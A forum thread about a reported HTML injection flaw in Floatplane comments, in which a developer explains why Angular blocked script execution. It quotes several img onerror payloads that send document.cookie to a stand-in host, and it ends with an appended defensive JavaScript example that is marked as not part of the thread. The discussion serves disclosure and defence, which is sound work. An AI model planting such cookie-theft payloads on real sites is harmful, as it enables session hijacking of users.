Help XSS Vulnerability in FloatPlane.com (New Site)

I was able to get all HTML code, scripts, etc. to autorun on Floatplane. I see this as a huge concern for people who are malicious and have different intent.

Judge a product on its own merits AND the company that made it.

How to setup MSI Afterburner OSD | How to make your AMD Radeon GPU more efficient with Radeon Chill | (Probably) Why LMG Merch shipping to the EU is expensive

Oneplus 6 (Early 2023 to present) | HP Envy 15" x360 R7 5700U (Mid 2021 to present) | Steam Deck (Late 2022 to present)

 

Mid 2023 AlTech Desktop Refresh - AMD R7 5800X (Mid 2023), XFX Radeon RX 6700XT MBA (Mid 2021), MSI X370 Gaming Pro Carbon (Early 2018), 32GB DDR4-3200 (16GB x2) (Mid 2022)

Noctua NH-D15 (Early 2021), Corsair MP510 1.92TB NVMe SSD (Mid 2020), beQuiet Pure Wings 2 140mm x2 & 120mm x1 (Mid 2023),

Luckily floatplane.media is better.

muh specs

Gaming and HTPC (reparations)- ASUS 1080, MSI X99A SLI Plus, 5820k- 4.5GHz @ 1.25v, Asetek-based 360mm AIO, RM 1000x, 16GB memory, 750D with front USB 2.0 replaced with 3.0 ports, 2 250GB 850 EVOs in RAID 0 (why not, only has games on it), some hard drives

Screens- Acer Predator XB241H (1080p, 144Hz G-Sync), LG 1080p ultrawide, (all mounted) directly wired to TV in other room

Stuff- K70 with reds, SteelSeries Rival, G13, full-desk-covering mouse mat

All parts black

Workstation (desk)- 3770k, 970 reference, 16GB of some Crucial memory, a motherboard of some kind I don't remember, Micomsoft SC-512N1-L/DVI, CM Storm Trooper (It's got a handle, can you handle that?), 240mm Asetek-based AIO, Crucial M550 256GB (upgrade soon), some hard drives, disc drives, and hot swap bays

Screens- 3 ASUS VN248H-P IPS 1080p screens mounted on a stand, some old TV on the wall above it.

Stuff- EpicGear Defiant (solderless swappable switches), G600, mounted mic and other stuff.

Laptop docking area- 2 1440p Korean monitors mounted, one AHVA matte, one Samsung PLS gloss (very annoying, yes). Trashy Razer BlackWidow Chroma... I mean like the J key doesn't click anymore. I got a Model M I use on it too, but it's time for a new keyboard. Some edgy UtechSmart mouse similar to the G600. Hooked to laptop dock for both of my Dell Precision laptops. (not only docking area)

Shelf- i7-2600 non-K (has VT-d), 380T, some ASUS Sandy ITX board, Intel quad NIC. Currently hosts shared files, setting up as pfSense box in VM. Also acts as spare gaming PC with a 580 or whatever someone brings. Hooked into laptop dock area via USB switch.

Just now, Syntaxvgm said:

Luckily floatplane.media is better.

lol. Nice joke, but seriously, this needs to be sorted out.


4 minutes ago, Syntaxvgm said:

Luckily floatplane.media is better.

lmfao u made that domain just to redirect to ur profile. GG

Just now, Aidan Dorfler said:

lmfao u made that domain just to redirect to ur profile. GG

Made it a while ago.


Let's hope no one reads this and makes a cookie stealer.

Thanks!

 

We fixed this stuff for live chat, as that's been a focus for us, but we'll be sure to apply the same stuff to comments as well.

I wonder if there will be bug bounty programs in the future once the dedicated Floatplane site is up. Hoping that it'll be patched soon.

There is more that meets the eye
I see the soul that is inside

 

 


11 hours ago, Aidan Dorfler said:

I was able to get all HTML code, scripts, etc. to autorun on Floatplane. I see this as a huge concern for people who are malicious and have different intent.

Yeah, we failed to sanitize the input on the backend side, so we've disabled all HTML on the client app. But I wanted to add that we weren't really vulnerable to XSS because Angular would have refused to render <script> and <style> tags, preventing you from actually trying to do a <script>alert('Mouhahahahaha, I'm the king of this website!')</script> or anything that would actually be a security concern.

Thank you for reporting this problem ^^ 

P.S.: Next time, it would actually be a better idea to create your post in the Test Posts subforum and tag us, or send us a PM, if you find any security issues :)

3 hours ago, AJJaxNet said:

Yeah, we failed to sanitize the input on the backend side, so we've disabled all HTML on the client app. But I wanted to add that we weren't really vulnerable to XSS because Angular would have refused to render <script> and <style> tags, preventing you from actually trying to do a <script>alert('Mouhahahahaha, I'm the king of this website!')</script> or anything that would actually be a security concern.

Thank you for reporting this problem ^^ 

P.S.: Next time, it would actually be a better idea to create your post in the Test Posts subforum and tag us, or send us a PM, if you find any security issues :)

Also, I know that it wasn't vulnerable to SCRIPT attacks, but the <img> tag DID work... which means you could get a website and steal the cookies that way. That's sadly how cookies work.

2 hours ago, Aidan Dorfler said:

Also, I know that it wasn't vulnerable to SCRIPT attacks, but the <img> tag DID work... which means you could get a website and steal the cookies that way. That's sadly how cookies work.

In order to steal the cookies the way you described it, you need to be able to execute some JavaScript code on the client, and as I explained before, Angular will prevent this since it's a huge security risk to allow code execution from a request.

Just to make sure that my theory wasn't flawed, I rolled back the client app to test it out the way described in the Stack Exchange page: https://www.floatplane.com/video/dmXfe12Cl5

Here are all 3 comments that have code injected to try and steal the cookies:


{"id":"5a399e044b928df7473882d8","user":"59f94c0bdd241b70349eb723","video":"dmXfe12Cl5","text":"<img src=x onerror=this.src='http://test.com/image.jpg?c='+document.cookie>","replying":null,"postDate":"2017-12-19T23:17:24.217Z","editDate":"2017-12-19T23:17:24.217Z","interactions":[],"replies":[],"hidden":0,"interactionCounts":{"like":0,"dislike":0}},
{"id":"5a399d9a4b928df7473882d7","user":"59f94c0bdd241b70349eb723","video":"dmXfe12Cl5","text":"<img src=x onerror=this.src='http://test.test.com/?c='+document.cookie>","replying":null,"postDate":"2017-12-19T23:15:38.346Z","editDate":"2017-12-19T23:15:38.346Z","interactions":[],"replies":[],"hidden":0,"interactionCounts":{"like":0,"dislike":0}},
{"id":"5a399d34a728aad8338a176d","user":"59f94c0bdd241b70349eb723","video":"dmXfe12Cl5","text":"<img src=\"https://test.test.com/test.jpg?c=' + document.cookie + '\" />","replying":null,"postDate":"2017-12-19T23:13:56.708Z","editDate":"2017-12-19T23:13:56.708Z","interactions":[],"replies":[],"hidden":0,"interactionCounts":{"like":0,"dislike":0}}


If I check the requests from the browser, I get:

https://www.floatplane.com/x
https://test.test.com/test.jpg?c=%27%20+%20document.cookie%20+%20%27

No cookie actually got into the URL since the javascript code never got interpreted.

1 minute ago, AJJaxNet said:

In order to steal the cookie the way you described it, you need to be able to execute some JavaScript code on the client, and as I explained before, Angular will prevent this since it's a huge security risk to allow code execution from a request.

Just to make sure that my theory wasn't flawed, I rolled back the client app to test it out the way described in the Stack Exchange page: https://www.floatplane.com/video/dmXfe12Cl5

Here are all 3 comments that have code injected to try and steal the cookies:

{"id":"5a399e044b928df7473882d8","user":"59f94c0bdd241b70349eb723","video":"dmXfe12Cl5","text":"<img src=x onerror=this.src='http://test.com/image.jpg?c='+document.cookie>","replying":null,"postDate":"2017-12-19T23:17:24.217Z","editDate":"2017-12-19T23:17:24.217Z","interactions":[],"replies":[],"hidden":0,"interactionCounts":{"like":0,"dislike":0}},
{"id":"5a399d9a4b928df7473882d7","user":"59f94c0bdd241b70349eb723","video":"dmXfe12Cl5","text":"<img src=x onerror=this.src='http://test.test.com/?c='+document.cookie>","replying":null,"postDate":"2017-12-19T23:15:38.346Z","editDate":"2017-12-19T23:15:38.346Z","interactions":[],"replies":[],"hidden":0,"interactionCounts":{"like":0,"dislike":0}},
{"id":"5a399d34a728aad8338a176d","user":"59f94c0bdd241b70349eb723","video":"dmXfe12Cl5","text":"<img src=\"https://test.test.com/test.jpg?c=' + document.cookie + '\" />","replying":null,"postDate":"2017-12-19T23:13:56.708Z","editDate":"2017-12-19T23:13:56.708Z","interactions":[],"replies":[],"hidden":0,"interactionCounts":{"like":0,"dislike":0}}


If I check the requests from the browser, I get:

https://www.floatplane.com/x
https://test.test.com/test.jpg?c=%27%20+%20document.cookie%20+%20%27

No cookie actually got into the URL since the javascript code never got interpreted.

oh ok, good to know. Well, thanks for looking into this. :)

Just a side note: you cannot access the website's cookie via document.cookie because it has the HttpOnly flag; it's not even possible by executing it directly from your console while you're on the site. (Some cookies are visible, but the one that actually matters is "sails.sid".)

 

However, it's still possible to hijack the session by making actual requests with XSS that imitate the client webapp, and this can be easily avoided with CSRF tokens.

Anyways, Angular does sanitize script tags while rendering a template (like any other major framework).

 

A recommendation is to add extra common security HTTP headers; since the site uses Sails, this is a nice and simple middleware that supports Connect/Express (Sails is compatible with Express). Also... or maybe a CSP policy (the HTML5 meta tag that can be a pain in the ass to configure).

P.S.: Sorry, I know it's still a very alpha site. It's just a reminder :P
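As an added example (not part of the original thread, and not Floatplane's or Sails' own code), here is what the fixes discussed in this thread look like in plain Connect/Express-style JavaScript: encoding comment text on the server so an injected tag renders as inert text, setting the security headers and CSP recommended above, and issuing the session cookie with HttpOnly. The function names, the hostname images.example and the policy values are assumptions.

```javascript
// Added example, not Floatplane's or Sails' own code. Function names,
// the hostname images.example and the policy values are assumptions.

// 1. Server-side output encoding for comment text. The raw text may be stored,
//    but it must never reach the page as HTML. Encoding these five characters
//    turns "<img src=x onerror=...>" into inert text the browser only displays.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// 2. The security headers suggested in the thread, as one Connect/Express-style
//    middleware (Sails accepts these). This CSP blocks inline scripts and inline
//    event handlers such as onerror, and only allows images from listed origins,
//    so a stray <img src="https://somewhere.else/..."> is not even fetched.
function securityHeaders() {
  return {
    "Content-Security-Policy":
      "default-src 'self'; script-src 'self'; img-src 'self' https://images.example; " +
      "object-src 'none'; base-uri 'self'; frame-ancestors 'none'",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
    "Referrer-Policy": "no-referrer",
  };
}
function securityHeadersMiddleware(req, res, next) {
  for (const [name, value] of Object.entries(securityHeaders())) {
    res.setHeader(name, value);
  }
  next();
}

// 3. Session cookie attributes. HttpOnly is why document.cookie never shows
//    sails.sid (as noted in the thread); Secure keeps it off plain HTTP, and
//    SameSite=Lax keeps most cross-site requests from carrying it, which
//    complements the CSRF tokens mentioned above.
function sessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed check against one of the comment payloads quoted in the thread.
function demo() {
  const injected = "<img src=x onerror=this.src='http://test.com/image.jpg?c='+document.cookie>";
  const rendered = escapeHtml(injected);
  return { rendered, safe: !rendered.includes("<") && !rendered.includes(">") };
}
console.log(demo());
```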
